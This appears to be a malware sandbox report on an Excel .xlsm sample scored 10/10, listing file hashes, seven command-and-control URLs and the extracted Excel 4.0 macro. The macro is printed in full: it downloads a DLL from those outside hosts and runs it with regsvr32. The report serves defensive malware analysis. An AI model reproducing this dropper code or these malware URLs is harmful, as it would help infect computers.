Overview

overview

10

Static

static

10

c18d9a1d8b...c.xlsm

windows7-x64

10

c18d9a1d8b...c.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c18d9a1d8bd404a2cec184a98a607bca2b53b6ca0e42f9881e10ee2ad0fe485c

  • Size

    20KB

  • Sample

    241120-12545stgma

  • MD5

    34125f9a3baf4f4f6de297b12e77c947

  • SHA1

    dac702750e14931d525d6610c4ab527a3098dbb7

  • SHA256

    c18d9a1d8bd404a2cec184a98a607bca2b53b6ca0e42f9881e10ee2ad0fe485c

  • SHA512

    6fe06bfd5d8fc088e732f6f9ae4892c288b1467731ae17a21bc36a4483623daf55c9e2f922747f51499fa70b28d86f277fa87aebb961be16406cc678850e6e31

  • SSDEEP

    384:mQZAVb1GNjJITo4CGzPd6ZIwVKb5CzgObff9kC+xbX7zL0crX:mTINqTo4FL3CBn9kC+xbLHjj

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.bridgewien.at/admin/9Osvbo9caA4QYishnWka/

http://bartboutens.nl/cgi-bin/aPqSkCZXI3ueRdI/

http://aleph.org.ng/wp-includes/k8YwVWkrdmUM9/

http://alkautsarlampung.sch.id/belajar/WQlNleMJKoulGBUvgC9/

http://automyjniafordon.bydgoszcz.pl/123/mOWZgMaL/

http://www.annuncisiciliani.it/app/3l1ZgVfwIEiIcGelh/

http://autoat.mx/assets/VljikBuT029PkSBfrc/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.bridgewien.at/admin/9Osvbo9caA4QYishnWka/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bartboutens.nl/cgi-bin/aPqSkCZXI3ueRdI/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aleph.org.ng/wp-includes/k8YwVWkrdmUM9/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alkautsarlampung.sch.id/belajar/WQlNleMJKoulGBUvgC9/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://automyjniafordon.bydgoszcz.pl/123/mOWZgMaL/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.annuncisiciliani.it/app/3l1ZgVfwIEiIcGelh/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://autoat.mx/assets/VljikBuT029PkSBfrc/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.bridgewien.at/admin/9Osvbo9caA4QYishnWka/
xlm40.dropper

http://bartboutens.nl/cgi-bin/aPqSkCZXI3ueRdI/
xlm40.dropper

http://aleph.org.ng/wp-includes/k8YwVWkrdmUM9/
xlm40.dropper

http://alkautsarlampung.sch.id/belajar/WQlNleMJKoulGBUvgC9/
xlm40.dropper

http://automyjniafordon.bydgoszcz.pl/123/mOWZgMaL/
xlm40.dropper

http://www.annuncisiciliani.it/app/3l1ZgVfwIEiIcGelh/
xlm40.dropper

http://autoat.mx/assets/VljikBuT029PkSBfrc/

Targets

    • Target

      c18d9a1d8bd404a2cec184a98a607bca2b53b6ca0e42f9881e10ee2ad0fe485c

    • Size

      20KB

    • MD5

      34125f9a3baf4f4f6de297b12e77c947

    • SHA1

      dac702750e14931d525d6610c4ab527a3098dbb7

    • SHA256

      c18d9a1d8bd404a2cec184a98a607bca2b53b6ca0e42f9881e10ee2ad0fe485c

    • SHA512

      6fe06bfd5d8fc088e732f6f9ae4892c288b1467731ae17a21bc36a4483623daf55c9e2f922747f51499fa70b28d86f277fa87aebb961be16406cc678850e6e31

    • SSDEEP

      384:mQZAVb1GNjJITo4CGzPd6ZIwVKb5CzgObff9kC+xbX7zL0crX:mTINqTo4FL3CBn9kC+xbLHjj

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks